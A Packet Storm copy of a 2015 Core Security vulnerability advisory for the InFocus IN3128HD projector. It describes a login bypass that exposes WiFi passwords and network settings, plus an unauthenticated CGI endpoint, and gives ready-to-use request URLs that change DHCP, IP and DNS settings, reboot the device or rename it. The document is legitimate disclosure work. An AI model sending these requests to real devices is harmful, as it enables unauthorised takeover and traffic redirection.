what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

InFocus IN3128HD Projector Missing Authentication

InFocus IN3128HD Projector Missing Authentication
Posted Apr 28, 2015
Authored by Core Security Technologies, Joaquin Rodriguez Varela | Site coresecurity.com

Core Security Technologies Advisory - The InFocus IN3128HD Projector is vulnerable to an authentication bypass in its web interface login page, and is missing authentication for the "webctrl.cgi.elf" CGI file, which allows several actions to be performed or configured inside the device. Firmware 0.26 is verified vulnerable.

tags | exploit, web, cgi
advisories | CVE-2014-8383, CVE-2014-8384
SHA-256 | 43fb2590b9fc435e2c9ebe21968f5729e87d0846d203db8e44a8e274d09e864c

InFocus IN3128HD Projector Missing Authentication

Change Mirror Download
1. Advisory Information

Title: InFocus IN3128HD Projector Multiple Vulnerabilities
Advisory ID: CORE-2015-0008
Advisory URL: http://www.coresecurity.com/advisories/infocus-in3128hd-projector-multiple-vulnerabilities
Date published: 2015-04-27
Date of last update: 2015-04-22
Vendors contacted: InFocus
Release mode: User release

2. Vulnerability Information

Class: Authentication Bypass Using an Alternate Path or Channel [CWE-288], Missing Authentication for Critical Function [CWE-306]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-8383, CVE-2014-8384



3. Vulnerability Description

The InFocus [1] IN3128HD brings 1080p projection into the classroom with a bright 4000-lumen display, versatile connections and smart networking features. It's portable enough to go from room to room, yet powerful enough to be installed in a fixed position.

The InFocus IN3128HD [2] Projector is vulnerable to an authentication bypass in its web interface login page, and is missing authentication for the "webctrl.cgi.elf" CGI file, which allows several actions to be performed or configured inside the device.

4. Vulnerable Packages

InFocus IN3128HD v0.26 Firmware
Other products and versions might be affected too, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Core Security recommends affected users avoid connecting their vulnerable devices to a remotely accessible network.

Contact the vendor for further information.

6. Credits

This vulnerability was discovered and researched by Joaquin Rodriguez Varela from Core Security CoreLabs Team. The publication of this advisory was coordinated by the Core Security Advisories Team.



7. Technical Description / Proof of Concept Code

7.1. Authentication Bypass in web server interface

The InFocus IN3128HD projector web server interface requires an admin password in order to view or modify the device configuration parameters. The vulnerability [CVE-2014-8383] is caused by a user's ability to bypass the login page (index.html) by knowing the name of the page (main.html) to which a logged user is forwarded after entering the correct password. The restricted pages contain no control whatsoever of logged or unauthenticated users. The login only checks the entered password and does not generate a session cookie if the user logs in correctly. The following URL allows an alternate preauth path to the restricted section:


http://<Projector-web-interface-IP>/main.html

This allows an unauthenticated user to access the device as an administrator and to see private information such as network configuration (network mask, DNS server, gateway, etc), WiFi configuration (including password), and the ability to modify any of these parameters.

7.2. Missing Authentication for Critical CGI file

The vulnerability [CVE-2014-8384] is caused by a missing authentication mechanism for the "webctrl.cgi.elf" CGI file, which is used by the web server to apply configuration changes. This file is located inside the "cgi-bin" folder, and is accessible by any unauthenticated user, allowing it to perform several configuration modifications and actions inside the projector.

Here are some examples of what can be done remotely and without authentication if the following URLs are used:



Modify any parameter in the DHCP Server configuration:

http://<Projector-web-interface-IP>/cgi-bin/webctrl.cgi.elf?&t:26,c:5,p:525294,s:00011&t:26,c:5,p:525295,s:0009<START-IP>&t:26,c:5,p:525296,s:0011<END-IP>&t:26,c:5,p:525297,s:0013<SUBNET-MASK-IP>&t:26,c:5,p:525298,s:0011<DEFAULT-GATEWAY-IP>&t:26,c:5,p:525299,s:0012<DNS-SERVER-IP>


Modify any parameter in the device IP configuration (DNS server as well):

http://<Projector-web-interface-IP>/cgi-bin/webctrl.cgi.elf?&t:26,c:5,p:525288,s:0006static&t:26,c:5,p:525289,s:0007<IP-ADDRESS>&t:26,c:5,p:525290,s:0013<SUBNET-MASK-IP>&t:26,c:5,p:525291,s:0007<DEFAULT-GATEWAY-IP>&t:26,c:5,p:525292,s:0007<DNS-SERVER-IP>


Remotely reboot the device (not only the web server):

http://<Projector-web-interface-IP>/cgi-bin/webctrl.cgi.elf?&t:26,c:5,p:720896


Change the device hostname:

http://<Projector-web-interface-IP>/cgi-bin/webctrl.cgi.elf?&t:26,p:589826,c:5,s:0006<NEW-HOSTNAME>


Several other actions and configurations can be performed using this CGI file, but is trivial to detail all of them considering that are the same actions a user can perform from the web interface.



8. Report Timeline

2015-04-07: Core Security sent an initial notification to InFocus.
2015-04-13: Core Security sent another notification to InFocus using their online contact support form [3].
2015-04-14: Core Security tried to contact InFocus employees using LinkedIn without success.
2015-04-16: Core Security contacted InFocus using Twitter and requested an email address that could be used to contact them.
2015-04-16: InFocus replied using their official Twitter account indicating that product support questions should be directed to the form at infocus.com/support/ or support@infocus.com.
2015-04-16: Core Security sent another email to the provided email requesting an answer.
2015-04-20: Core Security sent another email to the provided email account stating that an answer had not yet been received, and if that was still true on Friday, April 24, Core Security would be forced to publish its findings on Monday, April 27.
2015-04-21: Core Security contacted InFocus again using Twitter and explained that multiple attempts to contact them had been performed without any luck and requested a response.
2015-04-21: InFocus replied using their official Twitter account asking us to provide an email account so a support representative could contact us.
2015-04-21: Core Security provided the official advisories email in order to be contacted by an InFocus representative.
2015-04-22: InFocus sent an email stating that they were requested by their public relations department to contact Core Security. They asked Core to send them the draft version of the advisory.
2015-04-22: Core Security explained that it is not recommended to send this kind of information in plain text and asked if they could use PGP to send encrypted emails. In case they didn't want to use encrypted communications, Core was willing to send the draft advisory in plain text.
2015-04-22: InFocus informed Core Security that they no longer had any desire to see the information (advisory) and told Core to publish it if we felt it necessary.
2015-04-22: Core Security replied to InFocus that Core regretted their decision and that Core's only objective is to make users safer. We informed them that we will now have to make a user-release of the advisory without giving their affected users an alternative to solve the issues.
2015-04-27: Advisory CORE-2015-0008 published.
9. References

[1] http://www.infocus.com.
[2] http://www.infocus.com/projectors/IN3128HD.
[3] http://www.infocus.com/support/.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close